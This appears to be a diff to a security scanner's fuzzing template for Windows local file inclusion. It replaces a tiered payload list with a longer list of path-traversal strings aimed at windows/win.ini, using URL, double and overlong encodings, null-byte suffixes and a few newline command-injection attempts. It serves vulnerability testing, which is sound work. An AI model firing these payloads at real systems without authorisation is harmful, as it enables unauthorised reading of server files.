lfi was updated

--- a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml
+++ b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml
@@ -16,48 +16,94 @@ http:
 
     payloads:
       win_fuzz:
-        low:
-          - '\WINDOWS\win.ini'
+          - '/windows/win.ini'
           - '../../windows/win.ini'
-          - '....//....//windows/win.ini'
+          - '../../../windows/win.ini'
+          - '/../../../../windows/win.ini'
+          - '../../../../../../../../../windows/win.ini'
+          - '../../../../../../../../windows/win.ini'
+          - '../../../../../../../windows/win.ini'
+          - '../../../../../../windows/win.ini'
           - '../../../../../windows/win.ini'
-          - '/..///////..////..//////windows/win.ini'
-          - '/../../../../../../../../../windows/win.ini'
-          - './../../../../../../../../../../windows/win.ini'
-          - '..%2f..%2f..%2f..%2fwindows/win.ini'
-        medium:
-          - '\WINDOWS\win.ini%00'
-          - '\WINNT\win.ini'
-          - '\WINNT\win.ini%00'
-          - 'windows/win.ini%00'
-          - '/...\...\...\...\...\...\...\...\...\windows\win.ini'
-          - '/.../.../.../.../.../.../.../.../.../windows/win.ini'
-          - '/..../..../..../..../..../..../..../..../..../windows/win.ini'
-          - '/....\....\....\....\....\....\....\....\....\windows\win.ini'
-          - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
-          - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
-          - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
-          - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
-          - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
-          - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
-          - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
-          - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
-        high:
-          - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
-          - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
-          - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+          - '../../../../windows/win.ini'
+          - '../../../windows/win.ini'
+          - '../../../windows/win.ini%00'
+          - '../../../../../../../../../../../../windows/win.ini%00'
+          - '../../../../../../../../../../../../windows/win.ini'
+          - '/../../../../../../../../../../windows/win.ini^^'
+          - '/../../../../../../../../../../windows/win.ini'
+          - '/./././././././././././windows/win.ini'
+          - '\..\..\..\..\..\..\..\..\..\..\windows\win.ini'
+          - '..\..\..\..\..\..\..\..\..\..\windows\win.ini'
+          - '/..\../..\../..\../..\../..\../..\../windows/win.ini'
+          - '.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini'
+          - '\..\..\..\..\..\..\..\..\..\..\windows\win.ini%00'
+          - '..\..\..\..\..\..\..\..\..\..\windows\win.ini%00'
+          - '%2fwindows%2fwin.ini'
+          - '..%2f..%2fwindows%2fwin.ini'
+          - '..%2f..%2f..%2fwindows%2fwin.ini'
+          - '%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '..%2f..%2f..%2fwindows%2fwin.ini'
+          - '..%2f..%2f..%2fwindows%2fwin.ini%00'
+          - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00'
+          - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini^^'
+          - '%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2fwindows%2fwin.ini'
+          - '%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
+          - '..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
+          - '%2f..%5c..%2f..%5c..%2f..%5c..%2f..%5c..%2f..%5c..%2f..%5c..%2fwindows%2fwin.ini'
+          - '.%5c%5c.%2f.%5c%5c.%2f.%5c%5c.%2f.%5c%5c.%2f.%5c%5c.%2f.%5c%5c.%2fwindows%2fwin.ini'
+          - '%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00'
+          - '..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00'
+          - '%252e%252e%252fwindows%252fwin.ini'
+          - '%252e%252e%252fwindows%252fwin.ini%00'
+          - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+          - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
+          - '....//....//windows/win.ini'
+          - '..///////..////..//////windows/win.ini'
+          - '....%2f%2f....%2f%2fwindows%2fwin.ini'
+          - '..%2f%2f%2f%2f%2f%2f%2f..%2f%2f%2f%2f..%2f%2f%2f%2f%2f%2fwindows%2fwin.ini'
           - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
-          - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
-          - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
-          - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
-          - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
-          - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
-          - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
-          - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
-          - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
-          - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
-          - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
-
+          - '%0a/bin/cat%20/windows/win.ini'
+          - '%00/windows/win.ini%00'
+          - '%00../../../../../../windows/win.ini'
+          - '/../../../../../../../../../../../windows/win.ini%00.jpg'
+          - '/../../../../../../../../../../../windows/win.ini%00.html'
+          - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../windows/win.ini'
+          - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+          - '%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg'
+          - '%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.html'
+          - '%2f..%c0%af..%2f..%c0%af..%2f..%c0%af..%2f..%c0%af..%2f..%c0%af..%2f..%c0%af..%2fwindows%2fwin.ini'
+          - '%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin.ini'
+          - '\\&apos;/bin/cat%20/windows/win.ini\\&apos;'
+          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+          - '///../../../../../windows/win.ini'
+          - '//////../../../../../../windows/win.ini'
+          - '%5c%5c&apos;%2fbin%2fcat%20%2fwindows%2fwin.ini%5c%5c&apos;'
+          - '%2fcgi-bin%2f.%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin.ini'
+          - '%2fcgi-bin%2f.%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin.ini'
+          - '%2fcgi-bin%2f.%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin.ini'
+          - '%2fcgi-bin%2f.%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin.ini'
+          - '%2fcgi-bin%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2fwindows%2fwin.ini'
+          - '%2fcgi-bin%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2fwindows%2fwin.ini'
+          - '%2fcgi-bin%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2fwindows%2fwin.ini'
+          - '%2fcgi-bin%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2f.%%32%65%2fwindows%2fwin.ini'
+          - '%2f%2f%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
+          - '%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'
     fuzzing:
       - part: query
         type: replace # replaces existing parameter value with fuzz payload
